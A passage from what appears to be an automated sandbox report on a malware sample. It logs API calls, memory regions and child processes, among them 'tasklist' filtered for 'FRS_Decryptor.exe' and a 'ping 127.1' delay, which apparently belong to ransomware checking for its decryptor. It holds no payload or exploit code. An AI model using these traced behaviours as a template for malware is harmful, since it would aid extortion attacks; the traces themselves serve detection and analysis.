[0096.283] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0096.283] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0096.283] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0096.283] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x47fa30*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x47fa7c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x47fa7c*(hProcess=0x60, hThread=0x54, dwProcessId=0x878, dwThreadId=0xa18)) returned 1 [0096.286] CloseHandle (hObject=0x54) returned 1 [0096.286] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0096.286] GetEnvironmentStringsW () returned 0x62ad78* [0096.286] FreeEnvironmentStringsA (penv="=") returned 1 [0096.286] DeleteProcThreadAttributeList (in: lpAttributeList=0x47faa8 | out: lpAttributeList=0x47faa8) [0096.286] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0096.286] _close (_FileHandle=4) returned 0 [0096.286] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0096.739] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x47fdf0 | out: lpExitCode=0x47fdf0*=0x0) returned 1 [0096.739] CloseHandle (hObject=0x64) returned 1 [0096.739] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0096.741] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x47fdf0 | out: lpExitCode=0x47fdf0*=0x0) returned 1 [0096.741] CloseHandle (hObject=0x60) returned 1 [0096.741] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0096.741] SetConsoleMode (hConsoleHandle=0x2a0, dwMode=0x0) returned 0 [0096.741] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0096.741] GetConsoleMode (in: hConsoleHandle=0x2a0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0096.741] _get_osfhandle (_FileHandle=0) returned 0x24 [0096.741] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0096.741] SetConsoleInputExeNameW () returned 0x1 [0096.741] GetConsoleOutputCP () returned 0x1b5 [0096.741] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0096.741] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.742] exit (_Code=0) Process: id = "87" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x11a12000" os_pid = "0x870" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "86" os_parent_pid = "0x648" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4565 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 4566 start_va = 0xc0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4567 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4568 start_va = 0xf0000 end_va = 0xfefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 4569 start_va = 0x100000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 4570 start_va = 0x140000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4571 start_va = 0x180000 end_va = 0x183fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 4572 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 4573 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4574 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4575 start_va = 0x7ed90000 end_va = 0x7edb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed90000" filename = "" Region: id = 4576 start_va = 0x7edb7000 end_va = 0x7edb9fff entry_point = 0x0 region_type = private name = "private_0x000000007edb7000" filename = "" Region: id = 4577 start_va = 0x7edba000 end_va = 0x7edbafff entry_point = 0x0 region_type = private name = "private_0x000000007edba000" filename = "" Region: id = 4578 start_va = 0x7edbd000 end_va = 0x7edbdfff entry_point = 0x0 region_type = private name = "private_0x000000007edbd000" filename = "" Region: id = 4579 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4580 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4581 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4582 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4602 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4603 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4604 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4605 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4610 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4611 start_va = 0xd0000 end_va = 0xd3fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 4612 start_va = 0x1b0000 end_va = 0x22dfff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4613 start_va = 0x550000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 4614 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4615 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 4616 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4617 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4618 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4619 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4620 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4621 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4622 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4623 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4624 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4625 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4626 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4627 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4628 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4629 start_va = 0x7ec90000 end_va = 0x7ed8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec90000" filename = "" Thread: id = 254 os_tid = 0x880 Thread: id = 256 os_tid = 0x7bc Thread: id = 257 os_tid = 0xa38 Thread: id = 258 os_tid = 0xa28 Process: id = "88" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x12461000" os_pid = "0x878" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "86" os_parent_pid = "0x648" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4584 start_va = 0x820000 end_va = 0x83ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 4585 start_va = 0x840000 end_va = 0x841fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 4586 start_va = 0x850000 end_va = 0x85efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 4587 start_va = 0x860000 end_va = 0x89ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4588 start_va = 0x8a0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 4589 start_va = 0x8e0000 end_va = 0x8e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 4590 start_va = 0x8f0000 end_va = 0x8f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 4591 start_va = 0x900000 end_va = 0x901fff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 4592 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 4593 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4594 start_va = 0x7f460000 end_va = 0x7f482fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f460000" filename = "" Region: id = 4595 start_va = 0x7f48a000 end_va = 0x7f48cfff entry_point = 0x0 region_type = private name = "private_0x000000007f48a000" filename = "" Region: id = 4596 start_va = 0x7f48d000 end_va = 0x7f48dfff entry_point = 0x0 region_type = private name = "private_0x000000007f48d000" filename = "" Region: id = 4597 start_va = 0x7f48f000 end_va = 0x7f48ffff entry_point = 0x0 region_type = private name = "private_0x000000007f48f000" filename = "" Region: id = 4598 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4599 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4600 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4601 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4606 start_va = 0x9a0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4607 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4608 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4609 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 255 os_tid = 0xa18 Process: id = "89" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x10266000" os_pid = "0x4c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4630 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 4631 start_va = 0xea0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 4632 start_va = 0xec0000 end_va = 0xec1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 4633 start_va = 0xed0000 end_va = 0xedefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 4634 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 4635 start_va = 0xf20000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 4636 start_va = 0xf60000 end_va = 0xf63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 4637 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 4638 start_va = 0xf80000 end_va = 0xf81fff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 4639 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4640 start_va = 0x7ed70000 end_va = 0x7ed92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed70000" filename = "" Region: id = 4641 start_va = 0x7ed9b000 end_va = 0x7ed9bfff entry_point = 0x0 region_type = private name = "private_0x000000007ed9b000" filename = "" Region: id = 4642 start_va = 0x7ed9c000 end_va = 0x7ed9efff entry_point = 0x0 region_type = private name = "private_0x000000007ed9c000" filename = "" Region: id = 4643 start_va = 0x7ed9f000 end_va = 0x7ed9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed9f000" filename = "" Region: id = 4644 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4645 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4646 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4647 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4648 start_va = 0x1010000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 4649 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4650 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4651 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4652 start_va = 0xea0000 end_va = 0xeaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 4653 start_va = 0xeb0000 end_va = 0xeb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 4654 start_va = 0xf90000 end_va = 0x100dfff entry_point = 0xf90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4655 start_va = 0x1020000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 4656 start_va = 0x1140000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 4657 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4658 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4659 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4660 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4661 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4662 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4663 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4664 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4665 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4666 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4667 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4668 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4669 start_va = 0x7ec70000 end_va = 0x7ed6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ec70000" filename = "" Region: id = 4670 start_va = 0x1150000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 4671 start_va = 0x1190000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 4672 start_va = 0x7ed98000 end_va = 0x7ed9afff entry_point = 0x0 region_type = private name = "private_0x000000007ed98000" filename = "" Region: id = 4673 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 4674 start_va = 0xec0000 end_va = 0xec2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 4675 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 4676 start_va = 0x1130000 end_va = 0x1132fff entry_point = 0x1130000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 4677 start_va = 0x11d0000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 4678 start_va = 0x1210000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 4679 start_va = 0x7ed95000 end_va = 0x7ed97fff entry_point = 0x0 region_type = private name = "private_0x000000007ed95000" filename = "" Thread: id = 259 os_tid = 0x4d8 [0096.795] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0096.795] __set_app_type (_Type=0x1) [0096.795] __p__fmode () returned 0x76ea1768 [0096.795] __p__commode () returned 0x76ea176c 